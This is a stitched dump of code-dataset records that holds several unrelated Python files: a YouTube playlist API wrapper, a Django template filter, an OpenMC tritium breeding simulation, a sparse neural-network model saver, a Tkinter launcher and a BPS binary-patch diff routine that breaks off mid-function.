) | en | 0.343641 | # preparing config # for environment # intersection_id = list(config['lane_phase_info'].keys()) # logging.info(phase_list) # if args.algo == 'DQN': # config = dqn.DEFAULT_CONFIG.copy() # elif args.algo == 'PPO': # config = ppo.DEFAULT_CONFIG.copy() # elif args.algo == 'APEX': # config = dqn.apex.APEX_DEFAULT_CONFIG.copy() # elif args.algo == 'APPO': # config = ppo.appo.DEFAULT_CONFIG.copy() # elif args.algo == 'IMPALA': # config = impala.DEFAULT_CONFIG.copy() # elif args.algo == 'A3C': # config = a3c.DEFAULT_CONFIG.copy() # elif args.algo == 'A2C': # config = a3c.a2c.A2C_DEFAULT_CONFIG.copy() # else: # assert 0 == 1, 'Unexpected args.algo.' # "num_gpus_per_worker": 0.03125, # config['lr'] = grid_search([1e-2, 1e-3, 1e-4]) # build trainer # if i % 100 == 0: # checkpoint = trainer.save() # print(f'checkpoint saved at {checkpoint}') # register_env('cityflow_single_agent', # lambda config_: CityflowGymEnv(config_)) | 1.883738 | 2 |
qualitube/playlist_items.py | ericbrasiln/qualitube | 1 | 6616687 | <reponame>ericbrasiln/qualitube
import requests
import json
import pandas as pd
from configparser import ConfigParser
from .log import logger
from .exceptions import QualitubeException
config = ConfigParser()
config.read("config.ini")
API_KEY = config['credentials']['api_key']
class PlaylistItems:
"""
Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint
with extra functionality.
"""
def __init__(self, playlist_id, api_key=API_KEY):
self.playlist_id = playlist_id
self.api_key = api_key
def _try_parse(self, item, key):
try:
parsed = item[key]
except KeyError:
logger.warn(
f"YouTube Data API v3 does not provide the `{key}` parameter fo"
f"r the requested playlist item. Setting it as `None`"
)
parsed = None
return parsed
def _parse_response(self, data):
"""Parses the API 'PlaylistItems: list' endpoint's JSON
response for the retrieval of video metadata."""
raw = json.loads(data)
try:
items = raw["items"]
except KeyError:
if "error" in raw.keys():
raise QualitubeException(
f"\nAre you sure you set qualitube's config.ini file correctly?"
f"\nYou are getting the following error from YouTube's API response:"
f"\n\t{raw}"
)
raise
parsed = []
for item in items:
parsed.append({
'id': self._try_parse(item['contentDetails'], 'videoId'),
'title': self._try_parse(item['snippet'], 'title'),
'description': self._try_parse(item['snippet'], 'description'),
'published_at': self._try_parse(item['snippet'], 'publishedAt')
})
logger.info(f"Got PlaylistItem -> id: {item['id']} / title: {item['snippet']['title']}")
try:
next_page_token = raw["nextPageToken"]
except KeyError:
next_page_token = False
return parsed, next_page_token
def get_playlist_items_data(self, page_token=None):
"""Uses the YouTube Data API v3 'PlaylistItems: list' endpoint
to get all videos from PlaylistItems (a youtube playlist)."""
headers = {
'Accept': 'application/json'
}
params = [
('part', ['contentDetails', 'snippet']),
('playlistId', self.playlist_id),
('key', self.api_key),
('maxResults', 50)
]
if page_token:
params.append(('pageToken', page_token))
r = requests.get(
'https://youtube.googleapis.com/youtube/v3/playlistItems',
headers=headers,
params=params
)
videos_data, next_page_token = self._parse_response(r.text)
if next_page_token:
return videos_data + self.get_playlist_items_data(page_token=next_page_token)
return videos_data
def to_df(self):
data = self.get_playlist_items_data()
df = pd.DataFrame(data)
return df
| import requests
import json
import pandas as pd
from configparser import ConfigParser
from .log import logger
from .exceptions import QualitubeException
config = ConfigParser()
config.read("config.ini")
API_KEY = config['credentials']['api_key']
class PlaylistItems:
"""
Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint
with extra functionality.
"""
def __init__(self, playlist_id, api_key=API_KEY):
self.playlist_id = playlist_id
self.api_key = api_key
def _try_parse(self, item, key):
try:
parsed = item[key]
except KeyError:
logger.warn(
f"YouTube Data API v3 does not provide the `{key}` parameter fo"
f"r the requested playlist item. Setting it as `None`"
)
parsed = None
return parsed
def _parse_response(self, data):
"""Parses the API 'PlaylistItems: list' endpoint's JSON
response for the retrieval of video metadata."""
raw = json.loads(data)
try:
items = raw["items"]
except KeyError:
if "error" in raw.keys():
raise QualitubeException(
f"\nAre you sure you set qualitube's config.ini file correctly?"
f"\nYou are getting the following error from YouTube's API response:"
f"\n\t{raw}"
)
raise
parsed = []
for item in items:
parsed.append({
'id': self._try_parse(item['contentDetails'], 'videoId'),
'title': self._try_parse(item['snippet'], 'title'),
'description': self._try_parse(item['snippet'], 'description'),
'published_at': self._try_parse(item['snippet'], 'publishedAt')
})
logger.info(f"Got PlaylistItem -> id: {item['id']} / title: {item['snippet']['title']}")
try:
next_page_token = raw["nextPageToken"]
except KeyError:
next_page_token = False
return parsed, next_page_token
def get_playlist_items_data(self, page_token=None):
"""Uses the YouTube Data API v3 'PlaylistItems: list' endpoint
to get all videos from PlaylistItems (a youtube playlist)."""
headers = {
'Accept': 'application/json'
}
params = [
('part', ['contentDetails', 'snippet']),
('playlistId', self.playlist_id),
('key', self.api_key),
('maxResults', 50)
]
if page_token:
params.append(('pageToken', page_token))
r = requests.get(
'https://youtube.googleapis.com/youtube/v3/playlistItems',
headers=headers,
params=params
)
videos_data, next_page_token = self._parse_response(r.text)
if next_page_token:
return videos_data + self.get_playlist_items_data(page_token=next_page_token)
return videos_data
def to_df(self):
data = self.get_playlist_items_data()
df = pd.DataFrame(data)
return df | en | 0.629495 | Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint with extra functionality. Parses the API 'PlaylistItems: list' endpoint's JSON response for the retrieval of video metadata. Uses the YouTube Data API v3 'PlaylistItems: list' endpoint to get all videos from PlaylistItems (a youtube playlist). | 2.842618 | 3 |
core/templatetags/int_to_range.py | uktrade/great-cms | 10 | 6616688 | from django import template
register = template.Library()
@register.filter(name='int_to_range')
def int_to_range(number):
return range(number)
| from django import template
register = template.Library()
@register.filter(name='int_to_range')
def int_to_range(number):
return range(number)
| none | 1 | 1.875782 | 2 | |
vmraid/www/about.py | sowrisurya/vmraid | 0 | 6616689 | <gh_stars>0
# Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import vmraid
sitemap = 1
def get_context(context):
context.doc = vmraid.get_doc("About Us Settings", "About Us Settings")
return context
| # Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import vmraid
sitemap = 1
def get_context(context):
context.doc = vmraid.get_doc("About Us Settings", "About Us Settings")
return context | en | 0.691226 | # Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt | 1.626774 | 2 |
SQLServerControlInterface/main.py | GuilhermeAnselmi/SQLServerControlInterface | 0 | 6616690 | <filename>SQLServerControlInterface/main.py
from View.ssci import *
from globalStyle import *
import os
theme = Theme()
class Main:
# Check if the file exists
if not os.path.isfile("config.json"):
Config().CreateDefaults()
interface = Tk()
SSCI(interface, theme=theme)
interface.title("SQL Server Control Interface for Unix")
#interface.geometry("300x250+250+250")
interface.attributes("-zoomed", True)
interface.configure(bg=theme.background)
interface.mainloop()
| <filename>SQLServerControlInterface/main.py
from View.ssci import *
from globalStyle import *
import os
theme = Theme()
class Main:
# Check if the file exists
if not os.path.isfile("config.json"):
Config().CreateDefaults()
interface = Tk()
SSCI(interface, theme=theme)
interface.title("SQL Server Control Interface for Unix")
#interface.geometry("300x250+250+250")
interface.attributes("-zoomed", True)
interface.configure(bg=theme.background)
interface.mainloop()
| en | 0.167128 | # Check if the file exists #interface.geometry("300x250+250+250") | 2.039768 | 2 |
minimal_openmc_dagmc_simulations/minimal.py | Shimwell/-example-git-actions-docker-openmc-dagmc | 0 | 6616691 | <filename>minimal_openmc_dagmc_simulations/minimal.py
"""
Example which simulates a simple DAGMC neutronics model using OpenMC
"""
import os
import openmc
class MinimalSimulation:
"""This is a minimal class that has a few tiny methods to demonstrate testing
"""
def __init__(self):
pass
def simulate(self):
"""this runs a simple tbr simulation using openmc and returns the
tritium breeding ratio"""
universe = openmc.Universe()
geom = openmc.Geometry(universe)
breeder_material = openmc.Material(name="blanket_material") # Pb84.2Li15.8
breeder_material.add_element('Pb', 84.2, percent_type='ao')
breeder_material.add_element('Li', 15.8, percent_type='ao', enrichment=50.0, enrichment_target='Li6', enrichment_type='ao') # 50% enriched
breeder_material.set_density('atom/b-cm', 3.2720171e-2) # around 11 g/cm3
magnet_material = openmc.Material(name="pf_coil_material") # Pb84.2Li15.8
magnet_material.add_element('Cu', 1, percent_type='ao')
magnet_material.set_density('g/cm3', 8.96) # around 11 g/cm3
mats = openmc.Materials([breeder_material, magnet_material])
settings = openmc.Settings()
settings.batches = 100
settings.inactive = 0
settings.particles = 100
settings.run_mode = "fixed source"
settings.dagmc = True
source = openmc.Source()
source.space = openmc.stats.Point((0, 0, 0))
source.angle = openmc.stats.Isotropic()
source.energy = openmc.stats.Discrete([14e6], [1])
settings.source = source
tallies = openmc.Tallies()
tbr_tally = openmc.Tally(name="TBR")
tbr_tally.scores = ["(n,Xt)"] # where X is a wild card
tallies.append(tbr_tally)
model = openmc.model.Model(geom, mats, settings, tallies)
output_filename = model.run()
# open the results file
sp = openmc.StatePoint(output_filename)
# access the tally using pandas dataframes
tbr_tally = sp.get_tally(name='TBR')
df = tbr_tally.get_pandas_dataframe()
tbr_tally_result = df['mean'].sum()
return tbr_tally_result
| <filename>minimal_openmc_dagmc_simulations/minimal.py
"""
Example which simulates a simple DAGMC neutronics model using OpenMC
"""
import os
import openmc
class MinimalSimulation:
"""This is a minimal class that has a few tiny methods to demonstrate testing
"""
def __init__(self):
pass
def simulate(self):
"""this runs a simple tbr simulation using openmc and returns the
tritium breeding ratio"""
universe = openmc.Universe()
geom = openmc.Geometry(universe)
breeder_material = openmc.Material(name="blanket_material") # Pb84.2Li15.8
breeder_material.add_element('Pb', 84.2, percent_type='ao')
breeder_material.add_element('Li', 15.8, percent_type='ao', enrichment=50.0, enrichment_target='Li6', enrichment_type='ao') # 50% enriched
breeder_material.set_density('atom/b-cm', 3.2720171e-2) # around 11 g/cm3
magnet_material = openmc.Material(name="pf_coil_material") # Pb84.2Li15.8
magnet_material.add_element('Cu', 1, percent_type='ao')
magnet_material.set_density('g/cm3', 8.96) # around 11 g/cm3
mats = openmc.Materials([breeder_material, magnet_material])
settings = openmc.Settings()
settings.batches = 100
settings.inactive = 0
settings.particles = 100
settings.run_mode = "fixed source"
settings.dagmc = True
source = openmc.Source()
source.space = openmc.stats.Point((0, 0, 0))
source.angle = openmc.stats.Isotropic()
source.energy = openmc.stats.Discrete([14e6], [1])
settings.source = source
tallies = openmc.Tallies()
tbr_tally = openmc.Tally(name="TBR")
tbr_tally.scores = ["(n,Xt)"] # where X is a wild card
tallies.append(tbr_tally)
model = openmc.model.Model(geom, mats, settings, tallies)
output_filename = model.run()
# open the results file
sp = openmc.StatePoint(output_filename)
# access the tally using pandas dataframes
tbr_tally = sp.get_tally(name='TBR')
df = tbr_tally.get_pandas_dataframe()
tbr_tally_result = df['mean'].sum()
return tbr_tally_result
| en | 0.832637 | Example which simulates a simple DAGMC neutronics model using OpenMC This is a minimal class that has a few tiny methods to demonstrate testing this runs a simple tbr simulation using openmc and returns the tritium breeding ratio # Pb84.2Li15.8 # 50% enriched # around 11 g/cm3 # Pb84.2Li15.8 # around 11 g/cm3 # where X is a wild card # open the results file # access the tally using pandas dataframes | 2.628687 | 3 |
sparana/saver.py | jngannon/SpaRaNa | 0 | 6616692 | import numpy as np
import cupy as cp
import pickle
from cupy.sparse import coo_matrix
from cupy.sparse import csr_matrix
class model_saver:
def __init__(self, model):
self._model = model
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
self._sparse_parameters = None
def store_model(self):
''' Stores the current state of the model. '''
if self._model._layer_type == 'Sparse':
if self.model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), np.array(i._biases)) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
return
def restore_model(self):
''' Restores the weights stored in the model saver. '''
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = self._model_arrays[i][0].copy()
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.sparse.csr_matrix(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.array(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = np.array(self._model_arrays[i][0])
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
return
def pickle_model(self, filename):
''' Stores the model in a pickle file. '''
pickle.dump(self._model, open(filename, 'wb'))
print('Model pickled')
return
def load_model(self, filename):
''' Loads the model from a pickle file. '''
filelist = pickle.load(open(filename, 'rb'))
if self._model._layer_type == 'Sparse':
self._model_arrays = [(i[0].copy(), np.array(i[1])) for i in filelist]
if self._model._layer_type == 'Full':
for i in range(self._model._depth):
self._model.layers[i]._weights = filelist.layers[i]._weights
self._model.layers[i]._biases = filelist.layers[i]._biases
# Do a check that the layer type matches the weight datatype
def load_sparse_parameters(self, filename):
''' Loads sparse parameters into the loader class, and into the model.
(I can't think of a real use for loading the parameters into the loader, and model seperately)'''
parameters = pickle.load(open(filename, 'rb'))
for i in range(len(parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(parameters[i].nnz):
self._model._layers[i]._weights[parameters[i].row[j]][parameters[i].col[j]] = parameters[i].data[j]
print('Inserted weights from ', filename, ' into the weight matrices')
return
def store_sparse_parameters(self):
''' This returns the parameters that can be stored in memory in the notebook, use pickle_sparse_parameters after this'''
# What format will this give me, I need sparse matrices.
parameters = []
for i in self._model._layers:
these_parameters = np.multiply(i._weights, i._sparse_training_mask)
# Sparsify these_parameters
these_parameters = csr_matrix(these_parameters, dtype = np.float32)
these_parameters = these_parameters.tocoo()
parameters.append((these_parameters, i._biases))
self._sparse_parameters = parameters
return
def pickle_sparse_parameters(self, filename):
''' Stores the sparse parameters in a pickle file. '''
if self._sparse_parameters == None:
print('No parameters stored')
return
pickle.dump(self._sparse_parameters, open(filename, 'wb'))
print('Model pickled')
return
def restore_sparse_parameters(self):
''' Need a more specific name than sparse parameters. this will take some learning, drop the weights in'''
if self._sparse_parameters == None:
print('No parameters stored')
return
for i in range(len(self._sparse_parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
#self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(self._sparse_parameters[i][0].nnz):
self._model._layers[i]._weights[int(self._sparse_parameters[i][0].row[j])][int(self._sparse_parameters[i][0].col[j])] = self._sparse_parameters[i][0].data[j]
# Replace full arrays, test
#self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0))
#self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0]
self._model._layers[i]._biases = self._sparse_parameters[i][1]
print('Sparse parameters restored')
return
| import numpy as np
import cupy as cp
import pickle
from cupy.sparse import coo_matrix
from cupy.sparse import csr_matrix
class model_saver:
def __init__(self, model):
self._model = model
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
self._sparse_parameters = None
def store_model(self):
''' Stores the current state of the model. '''
if self._model._layer_type == 'Sparse':
if self.model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), np.array(i._biases)) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
return
def restore_model(self):
''' Restores the weights stored in the model saver. '''
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = self._model_arrays[i][0].copy()
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.sparse.csr_matrix(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.array(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = np.array(self._model_arrays[i][0])
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
return
def pickle_model(self, filename):
''' Stores the model in a pickle file. '''
pickle.dump(self._model, open(filename, 'wb'))
print('Model pickled')
return
def load_model(self, filename):
''' Loads the model from a pickle file. '''
filelist = pickle.load(open(filename, 'rb'))
if self._model._layer_type == 'Sparse':
self._model_arrays = [(i[0].copy(), np.array(i[1])) for i in filelist]
if self._model._layer_type == 'Full':
for i in range(self._model._depth):
self._model.layers[i]._weights = filelist.layers[i]._weights
self._model.layers[i]._biases = filelist.layers[i]._biases
# Do a check that the layer type matches the weight datatype
def load_sparse_parameters(self, filename):
''' Loads sparse parameters into the loader class, and into the model.
(I can't think of a real use for loading the parameters into the loader, and model seperately)'''
parameters = pickle.load(open(filename, 'rb'))
for i in range(len(parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(parameters[i].nnz):
self._model._layers[i]._weights[parameters[i].row[j]][parameters[i].col[j]] = parameters[i].data[j]
print('Inserted weights from ', filename, ' into the weight matrices')
return
def store_sparse_parameters(self):
''' This returns the parameters that can be stored in memory in the notebook, use pickle_sparse_parameters after this'''
# What format will this give me, I need sparse matrices.
parameters = []
for i in self._model._layers:
these_parameters = np.multiply(i._weights, i._sparse_training_mask)
# Sparsify these_parameters
these_parameters = csr_matrix(these_parameters, dtype = np.float32)
these_parameters = these_parameters.tocoo()
parameters.append((these_parameters, i._biases))
self._sparse_parameters = parameters
return
def pickle_sparse_parameters(self, filename):
''' Stores the sparse parameters in a pickle file. '''
if self._sparse_parameters == None:
print('No parameters stored')
return
pickle.dump(self._sparse_parameters, open(filename, 'wb'))
print('Model pickled')
return
def restore_sparse_parameters(self):
''' Need a more specific name than sparse parameters. this will take some learning, drop the weights in'''
if self._sparse_parameters == None:
print('No parameters stored')
return
for i in range(len(self._sparse_parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
#self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(self._sparse_parameters[i][0].nnz):
self._model._layers[i]._weights[int(self._sparse_parameters[i][0].row[j])][int(self._sparse_parameters[i][0].col[j])] = self._sparse_parameters[i][0].data[j]
# Replace full arrays, test
#self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0))
#self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0]
self._model._layers[i]._biases = self._sparse_parameters[i][1]
print('Sparse parameters restored')
return
| en | 0.677307 | Stores the current state of the model. Restores the weights stored in the model saver. Stores the model in a pickle file. Loads the model from a pickle file. # Do a check that the layer type matches the weight datatype Loads sparse parameters into the loader class, and into the model. (I can't think of a real use for loading the parameters into the loader, and model seperately) # Put the training masks in the layer objects, TODO turn this into a [0,1] mask #parameters[i] # Put the individual weights in the weight matrices This returns the parameters that can be stored in memory in the notebook, use pickle_sparse_parameters after this # What format will this give me, I need sparse matrices. # Sparsify these_parameters Stores the sparse parameters in a pickle file. Need a more specific name than sparse parameters. this will take some learning, drop the weights in # Put the training masks in the layer objects, TODO turn this into a [0,1] mask #self._model._sparse_training_mask = None #parameters[i] # Put the individual weights in the weight matrices # Replace full arrays, test #self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0)) #self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0] | 2.179459 | 2 |
bps/diff.py | tcprescott/python-bps | 1 | 6616693 | # This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# the COPYING file included with this distribution or
# http://sam.zoy.org/wtfpl/COPYING for more details.
"""
Tools for creating BPS patches.
For more information about the basic algorithm used here, see the article
"Intro to Delta Encoding":
https://gitorious.org/python-blip/pages/IntroToDeltaEncoding
"""
from zlib import crc32
from bps import operations as ops
from bps.util import BlockMap
def iter_blocks(data, blocksize):
offset = 0
while offset < len(data):
block = data[offset:offset+blocksize]
yield (block, offset)
offset += 1
def measure_op(blocksrc, sourceoffset, target, targetoffset):
"""
Measure the match between blocksrc and target at these offsets.
"""
# The various parameters line up something like this:
#
# v-- sourceoffset
# ...ABCDExGHI... <-- blocksrc
#
# ...xxxABCDEF... <-- target
# ^-- targetOffset
#
# result: backspan = 2, forespan = 3
#
# Measure how far back the source and target files match from these
# offsets.
backspan = 0
# We need the +1 here because the test inside the loop is actually looking
# at the byte *before* the one pointed to by (sourceoffset-backspan), so
# we need our span to stretch that little bit further.
maxspan = min(sourceoffset, targetoffset) + 1
for backspan in range(maxspan):
if blocksrc[sourceoffset-backspan-1] != target[targetoffset-backspan-1]:
break
# Measure how far forward the source and target files are aligned.
forespan = 0
sourcespan = len(blocksrc) - sourceoffset
targetspan = len(target) - targetoffset
maxspan = min(sourcespan, targetspan)
for forespan in range(maxspan):
if blocksrc[sourceoffset+forespan] != target[targetoffset+forespan]:
break
else:
# We matched right up to the end of the file.
forespan += 1
return backspan, forespan
def diff_bytearrays(blocksize, source, target, metadata=""):
"""
Yield a sequence of patch operations that transform source to target.
"""
yield ops.Header(len(source), len(target), metadata)
# We assume the entire source file will be available when applying this
# patch, so load the entire thing into the block map.
sourcemap = BlockMap()
for block, offset in iter_blocks(source, blocksize):
sourcemap.add_block(block, offset)
# Points at the next byte of the target buffer that needs to be encoded.
targetWriteOffset = 0
# Points at the next byte of the target buffer we're searching for
# encodings for. If we can't find an encoding for a particular byte, we'll
# leave targetWriteOffset alone and increment this offset, on the off
# chance that we find a new encoding that we can extend backwards to
# targetWriteOffset.
targetEncodingOffset = 0
# Keep track of blocks seen in the part of the target buffer before
# targetWriteOffset. Because targetWriteOffset does not always advance by
# an even multiple of the blocksize, there can be some lag between when
# targetWriteOffset moves past a particular byte, and when that byte's
# block is added to targetmap.
targetmap = BlockMap()
targetblocks = iter_blocks(target, blocksize)
# Points to the byte just beyond the most recent block added to targetmap;
# the difference between this and targetWriteOffset measures the 'some lag'
# described above.
nextTargetMapBlockOffset = 0
# A place to store operations before we spit them out. This gives us an
# opportunity to replace operations if we later come across a better
# alternative encoding.
opbuf = ops.OpBuffer(target)
while targetEncodingOffset < len(target):
# Keeps track of the most efficient operation for encoding this
# particular offset that we've found so far.
bestOp = None
bestOpEfficiency = 0
bestOpBackSpan = 0
bestOpForeSpan = 0
blockend = targetEncodingOffset + blocksize
block = target[targetEncodingOffset:blockend]
for sourceOffset in sourcemap.get_block(block):
backspan, forespan = measure_op(
source, sourceOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
if sourceOffset == targetEncodingOffset:
candidate = ops.SourceRead(backspan+forespan)
else:
candidate = ops.SourceCopy(
backspan+forespan,
sourceOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
for targetOffset in targetmap.get_block(block):
backspan, forespan = measure_op(
target, targetOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
candidate = ops.TargetCopy(
backspan+forespan,
targetOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
# If we can't find a copy instruction that encodes this block, or the
# best one we've found is a net efficiency loss, we'll have to issue
# a TargetRead... later.
if bestOp is None or bestOpEfficiency < 1.0:
targetEncodingOffset += 1
continue
# We found an encoding for the target block, so issue a TargetRead for
# all the bytes from the end of the last block up to now.
if targetWriteOffset < targetEncodingOffset:
tr = ops.TargetRead(target[targetWriteOffset:targetEncodingOffset])
opbuf.append(tr)
targetWriteOffset = targetEncodingOffset
opbuf.append(bestOp, rollback=bestOpBackSpan)
targetWriteOffset += bestOpForeSpan
# The next block we want to encode starts after the bytes we've
# just written.
targetEncodingOffset = targetWriteOffset
# If it's been more than BLOCKSIZE bytes since we added a block to
# targetmap, process the backlog.
while (targetWriteOffset - nextTargetMapBlockOffset) >= blocksize:
newblock, offset = next(targetblocks)
targetmap.add_block(newblock, offset)
nextTargetMapBlockOffset = offset + len(newblock)
for op in opbuf:
yield op
if targetWriteOffset < len(target):
# It's TargetRead all the way up to the end of the file.
yield ops.TargetRead(target[targetWriteOffset:])
yield ops.SourceCRC32(crc32(source))
yield ops.TargetCRC32(crc32(target))
| # This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# the COPYING file included with this distribution or
# http://sam.zoy.org/wtfpl/COPYING for more details.
"""
Tools for creating BPS patches.
For more information about the basic algorithm used here, see the article
"Intro to Delta Encoding":
https://gitorious.org/python-blip/pages/IntroToDeltaEncoding
"""
from zlib import crc32
from bps import operations as ops
from bps.util import BlockMap
def iter_blocks(data, blocksize):
offset = 0
while offset < len(data):
block = data[offset:offset+blocksize]
yield (block, offset)
offset += 1
def measure_op(blocksrc, sourceoffset, target, targetoffset):
"""
Measure the match between blocksrc and target at these offsets.
"""
# The various parameters line up something like this:
#
# v-- sourceoffset
# ...ABCDExGHI... <-- blocksrc
#
# ...xxxABCDEF... <-- target
# ^-- targetOffset
#
# result: backspan = 2, forespan = 3
#
# Measure how far back the source and target files match from these
# offsets.
backspan = 0
# We need the +1 here because the test inside the loop is actually looking
# at the byte *before* the one pointed to by (sourceoffset-backspan), so
# we need our span to stretch that little bit further.
maxspan = min(sourceoffset, targetoffset) + 1
for backspan in range(maxspan):
if blocksrc[sourceoffset-backspan-1] != target[targetoffset-backspan-1]:
break
# Measure how far forward the source and target files are aligned.
forespan = 0
sourcespan = len(blocksrc) - sourceoffset
targetspan = len(target) - targetoffset
maxspan = min(sourcespan, targetspan)
for forespan in range(maxspan):
if blocksrc[sourceoffset+forespan] != target[targetoffset+forespan]:
break
else:
# We matched right up to the end of the file.
forespan += 1
return backspan, forespan
def diff_bytearrays(blocksize, source, target, metadata=""):
"""
Yield a sequence of patch operations that transform source to target.
"""
yield ops.Header(len(source), len(target), metadata)
# We assume the entire source file will be available when applying this
# patch, so load the entire thing into the block map.
sourcemap = BlockMap()
for block, offset in iter_blocks(source, blocksize):
sourcemap.add_block(block, offset)
# Points at the next byte of the target buffer that needs to be encoded.
targetWriteOffset = 0
# Points at the next byte of the target buffer we're searching for
# encodings for. If we can't find an encoding for a particular byte, we'll
# leave targetWriteOffset alone and increment this offset, on the off
# chance that we find a new encoding that we can extend backwards to
# targetWriteOffset.
targetEncodingOffset = 0
# Keep track of blocks seen in the part of the target buffer before
# targetWriteOffset. Because targetWriteOffset does not always advance by
# an even multiple of the blocksize, there can be some lag between when
# targetWriteOffset moves past a particular byte, and when that byte's
# block is added to targetmap.
targetmap = BlockMap()
targetblocks = iter_blocks(target, blocksize)
# Points to the byte just beyond the most recent block added to targetmap;
# the difference between this and targetWriteOffset measures the 'some lag'
# described above.
nextTargetMapBlockOffset = 0
# A place to store operations before we spit them out. This gives us an
# opportunity to replace operations if we later come across a better
# alternative encoding.
opbuf = ops.OpBuffer(target)
while targetEncodingOffset < len(target):
# Keeps track of the most efficient operation for encoding this
# particular offset that we've found so far.
bestOp = None
bestOpEfficiency = 0
bestOpBackSpan = 0
bestOpForeSpan = 0
